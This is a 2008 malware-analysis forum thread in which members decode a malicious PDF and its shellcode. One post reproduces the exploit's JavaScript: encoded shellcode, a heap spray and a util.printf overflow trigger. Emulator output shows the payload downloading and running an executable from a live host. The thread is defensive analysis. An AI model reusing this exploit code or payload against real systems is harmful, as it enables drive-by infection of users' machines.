Malware Domain List

Malware Related => Malware Analysis => Topic started by: jimmyleo on November 16, 2008, 06:34:17 am

Title: PDF exploit issue
Post by: jimmyleo on November 16, 2008, 06:34:17 am
Original pdf exploit file is index.pdf.
I've got the plain stream with bobby's inflater in 3.tmp.
I renamed it as FLevel.txt. and then I decoded it to second level as SLevel.txt.
But I'm confused with following shellcode. How to decode it?
Any thoughts?


Title: Re: PDF exploit issue
Post by: bobby on November 16, 2008, 07:50:56 am
Shellcode is XORed with 0xEE.
Here is the download URL from the shellcode after XORing it with 0xEE:
hxxp://79.135.167.18/cgi-bin/index.cgi?fc413c500100f07002123510f6067317db1d02b55afdb30001080400000000170
Title: Re: PDF exploit issue
Post by: jimmyleo on November 16, 2008, 02:03:47 pm
hi bobby

thnx 4 your help.
how did know the XOR value?
and how can I debug the shellcode?

Title: Re: PDF exploit issue
Post by: SysAdMini on November 16, 2008, 02:59:09 pm
how did know the XOR value?
and how can I debug the shellcode?

Download xorsearch from http://blog.didierstevens.com/programs/xorsearch/

Save the shellcode in Malzilla.

run "XORSearch.exe -si -l 1000 hexfile.bin http"


or load the shellcode into IDA Pro , disassemble and find the xor value
Title: Re: PDF exploit issue
Post by: jimmyleo on November 16, 2008, 04:30:44 pm
yep I got it~~

thnx SysAdMini


and I've catched another exploit.

how about this?

there's maybe an ALPHA2 compression level finally?
Title: Re: PDF exploit issue
Post by: sowhat-x on November 16, 2008, 05:20:49 pm
That's as far I can get for the time being...
Code: [Select]
lemiros=unescape("%u03eb%ueb59%ue805%ufff8%uffff%u494f%u4949%u4949%u5149%u565a%u5854%u3336%u5630%u3458%u3041%u3642%u4848%u4230%u3033%u4342%u5856%u4232%u4244%u3448%u3241%u4441%u4130%u5444%u4442%u4251%u4130%u4144%u5856%u5a34%u4238%u4a44%u4d4f%u4e4b%u3142%u354c%u544c%u4343%u4c49%u3648%u4b49%u434e%u5041%u3842%u5346%u504c%u4949%u4e44%u4f4c%u4e4b%u5045%u4e4a%u4e4b%u4f4f%u4f4f%u4f4f%u4742%u544e%u4949%u5949%u3949%u4c43%u4f4d%u534a%u4a49%u3949%u3949%u4949%u3144%u4d49%u4945%u5144%u4e49%u4845%u3346%u5144%u4d49%u5941%u5144%u4441%u4144%u4e4c%u4a45%u4144%u4e4d%u3847%u4e41%u494c%u564c%u3144%u4e47%u4b49%u494c%u4644%u3144%u4d47%u584d%u4a4c%u5746%u4c4f%u4c50%u4c4a%u4144%u4a48%u394c%u5644%u3144%u464b%u4f43%u3947%u4c42%u364c%u434f%u4e4d%u3941%u4c42%u4c48%u314c%u3550%u494d%u4d4e%u374b%u5742%u4c42%u4c48%u4c47%u3144%u4546%u3144%u4d4f%u4b4d%u494c%u454c%u544a%u574a%u394c%u354a%u4a4c%u5542%u4f4f%u3144%u5941%u4144%u4d4f%u4845%u594c%u554c%u354a%u574a%u494b%u494c%u554a%u4144%u3949%u394c%u454c%u5144%u5643%u4144%u3650%u414c%u354f%u5947%u4144%u4449%u4f43%u594d%u4c42%u4741%u4c49%u5949%u3949%u4949%u414c%u554f%u4946%u4c4b%u4c4f%u4648%u4c50%u4645%u4c43%u4144%u3441%u4f43%u494a%u4c42%u5741%u4a46%u4949%u5949%u5949%u514c%u354f%u484c%u4c4f%u4d4f%u5149%u4a47%u5149%u4e4e%u3643%u3149%u4a4f%u5149%u4c47%u514c%u5745%u4b49%u4144%u5445%u4f43%u4b49%u4c4c%u4648%u4c50%u5745%u5550%u494d%u594c%u4c45%u4f4a%u4b47%u4f4e%u4550%u4d4d%u394c%u394d%u4e41%u4f4e%u3949%u3949%u4a4c%u4549%u4c49%u4c49%u4c4c%u4c4f%u4c49%u4648%u4c50%u4645%u5144%u3445%u4c49%u4c4c%u3648%u4c50%u3649%u4c49%u3648%u4c50%u564d%u4a4c%u5549%u4345%u314e%u3549%u4e4e%u3642%u4c4a%u4c4b%u4c4f%u4c4c%u3648%u544b%u4c43%u4c42%u5344%u574b%u3747%u4a4c%u4549%u354c%u4741%u4b4f%u4648%u5648%u3648%u4d50%u4f4e%u4e4d%u4c49%u4e4b%u4f48%u4f4c%u4d4a%u4f4d%u4f4d%u4e4b%u4f4e%u4e4c%u4e4c%u3949%u4d50%u4f4e%u4e4d%u4c4c%u4e42%u4e4c%u4e4d%u4f4e%u4f46%u4d4d%u4f42%u4e4b%u4f4e%u4f4c%u4e4d%u4f48%u4e4b%u4e42%u4d4a%u4949%u4c50%u4f42%u4f47%u4d4e%u4e41%u4f4e%u4f4c%u5949%u4d4e%u4e41%u4f42%u4e4d%u4c4d%u4f41%u4e4b%u4f4e%u4f4a%u4f4d%u5949%u4d45%u4f48%u4f4a%u4f4d%u4d45%u4f42%u4f4b%u4e4b%u4f4a%u4e4b%u4e42%u4d4a%u5949%u4e4e%u4e4b%u4f45%u4f46%u4f48%u4f47%u3949%u4c4e%u4c4b%u4d45%u4d4d%u4f48%u4e50%u4f47%u4f45%u4f48%u4f4a%u4f4d%u4c4d%u4f48%u4d4f%u4f42%u4f45%u4f4e%u4d4a%u3949%u364a%u3746%u4746%u4742%u334c%u524f%u424f%u3644%u3645%u4743%u364a%u4744%u5641%u3647%u364f%u3743%u4250%u3643%u364f%u364d%u524f%u5747%u464f%u5744%u464b%u424f%u4647%u4645%u5746%u3645%u374a%u4645%u5250%u5742%u464a%u4742%u534f%u364a%u434d%u3343%u3341%u4842%u005a");
 var nades=unescape("%u0A0A%u0A0A");
 var makofamos=20;
 var nanor=makofamos+lemiros.length;
 while(nades.length<nanor)nades+=nades;
 var fadad=nades.substring(0,nanor);
 var lusibirasa=nades.substring(0,nades.length-nanor);
 while(lusibirasa.length+nanor<0x60000)lusibirasa=lusibirasa+lusibirasa+fadad;
 var vatekere=new Array();
 for(vener9=0;vener9<1200;vener9++)
 {
   vatekere[vener9]=lusibirasa+lemiros
 }
 var kekifidu1=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
 util.printf("%45000f",kekifidu1);
Title: Re: PDF exploit issue
Post by: SysAdMini on November 16, 2008, 05:36:05 pm
how about this?

there's maybe an ALPHA2 compression level finally?

It's not simply xor encoded. Load it into IDA and you will see the algorithm.

But if you only wanna know what is does, then run it in Malzilla's shellcode analyzer.
Here ist the output.
Code: [Select]
verbose = 0
Hook me Captain Cook!
userhooks.c:127 user_hook_ExitThread
ExitThread(32)
stepcount 13829
FARPROC WINAPI GetProcAddress (
     HMODULE hModule = 0x7c800000 =>
         none;
     LPCSTR lpProcName = 0x0041714e =>
           = "GetSystemDirectoryA";
) = 0x7c814eea;
FARPROC WINAPI GetProcAddress (
     HMODULE hModule = 0x7c800000 =>
         none;
     LPCSTR lpProcName = 0x00417162 =>
           = "WinExec";
) = 0x7c86136d;
FARPROC WINAPI GetProcAddress (
     HMODULE hModule = 0x7c800000 =>
         none;
     LPCSTR lpProcName = 0x0041716a =>
           = "ExitThread";
) = 0x7c80c058;
FARPROC WINAPI GetProcAddress (
     HMODULE hModule = 0x7c800000 =>
         none;
     LPCSTR lpProcName = 0x00417175 =>
           = "LoadLibraryA";
) = 0x7c801d77;
HMODULE LoadLibraryA (
     LPCTSTR lpFileName = 0x00417182 =>
           = "urlmon";
) = 0x7df20000;
FARPROC WINAPI GetProcAddress (
     HMODULE hModule = 0x7df20000 =>
         none;
     LPCSTR lpProcName = 0x00417189 =>
           = "URLDownloadToFileA";
) = 0x7df7b0bb;
UINT GetSystemDirectory (
     LPTSTR lpBuffer = 0x0012fe74 =>
         none;
     UINT uSize = 32;
) =  19;
HRESULT URLDownloadToFile (
     LPUNKNOWN pCaller = 0x00000000 =>
         none;
     LPCTSTR szURL = 0x0041719c =>
           = "http://beshragos.com/work/getexe.php?h=31";
     LPCTSTR szFileName = 0x0012fe74 =>
           = "c:\WINDOWS\system32\a.exe";
     DWORD dwReserved = 0;
     LPBINDSTATUSCALLBACK lpfnCB = 0;
) =  0;
UINT WINAPI WinExec (
     LPCSTR lpCmdLine = 0x0012fe74 =>
           = "c:\WINDOWS\system32\a.exe";
     UINT uCmdShow = 0;
) =  32;
void ExitThread (
     DWORD dwExitCode = 32;
) =  0;

Finished
Title: Re: PDF exploit issue
Post by: sowhat-x on November 16, 2008, 05:36:15 pm
/me thinks I got eventually...thanks to bobby and Malzilla's libemu bindings,he-he...  ;D

Code: [Select]
hxxp://beshragos.com/work/getexe.php?h=31
Title: Re: PDF exploit issue
Post by: sowhat-x on November 16, 2008, 05:37:01 pm
Lmao - now that's what I call synchronization!  :)
Title: Re: PDF exploit issue
Post by: SysAdMini on November 16, 2008, 05:44:16 pm
Lmao - now that's what I call synchronization!  :)

Nice. Same answer within 10 seconds :)
Title: Re: PDF exploit issue
Post by: sowhat-x on November 16, 2008, 05:49:33 pm
Lol,got kinda confused with it...exactly what you said:
was testing different xor keys,until something kinda recognizable gets returned...
and when i understood this certainly couldn't be the case,i decided to go for the...
libemu one-click solution,he-he  :D
Title: Re: PDF exploit issue
Post by: bobby on November 16, 2008, 06:11:19 pm
There are a couple of shellcodes where Malzilla's Shellcode analyzer can't help.
In such case, copy the shellcode to HexView page and click on Disassemble.
Scroll down the disassembled content, and see if there is a error message.
If there is one, saying that there is an unexpected byte at some address, it means that from that address on there is a content that need to be decoded (e.g. XOR).
Scroll the disassembled content and search for first occurrence of XOR instruction, e.g. XOR [EPB], AL.
If XOR is using AL for XOR key, search what is put in AL. In most of the cases, just a couple of instructions before XOR, you should see an instruction which put something in AL (e.g. MOV AL, 0x000000EE). Now you got the XOR key.

Malzilla can do XOR decoding (HexView tab).

As for now, it can't do other operations that are also used for encrypting (ROR, ROL, ADD, SUB etc.)
Title: Re: PDF exploit issue
Post by: sowhat-x on November 16, 2008, 06:20:56 pm
Quote
Scroll down the disassembled content, and see if there is a error message.
If there is one, saying that there is an unexpected byte at some address,
it means that from that address on there is a content that need to be decoded (e.g. XOR).
Oh,that explains it now...doh,i'm an idiot,i thought that this error code,
was some kind of internal limitation of the disasm engine or something...  :P
Title: Re: PDF exploit issue
Post by: bobby on November 16, 2008, 06:27:26 pm
Quote
Scroll down the disassembled content, and see if there is a error message.
If there is one, saying that there is an unexpected byte at some address,
it means that from that address on there is a content that need to be decoded (e.g. XOR).
Oh,that explains it now...doh,i'm an idiot,i thought that this error code,
was some kind of internal limitation of the disasm engine or something...  :P
You will get same error message in that case too.
Unfortunately, I use some older version of libdisassm - 0.21-pre1 ( http://bastard.sourceforge.net/libdisasm.html ), as there is no newer Pascal port of it.
I can update it, but now I have some more important items on Malzilla's ToDo list (working on Malzilla 2.0 - total rewrite of the engine, based on real DOM parser, which means that we wouldn't need Kalimero anymore, as Malzilla will know how to deal with e.g. GetElementById etc.)
Title: Re: PDF exploit issue
Post by: jimmyleo on November 17, 2008, 03:16:01 am
long time no see~~ sowhat-x ;)

I've also got some error message from shellcode analyser as following:

Code: [Select]
verbose = 0
cpu error error accessing 0x42363501 not mapped

stepcount 16

Finished

and XORSearch & Malzilla's HexView are good for finding XOR value~~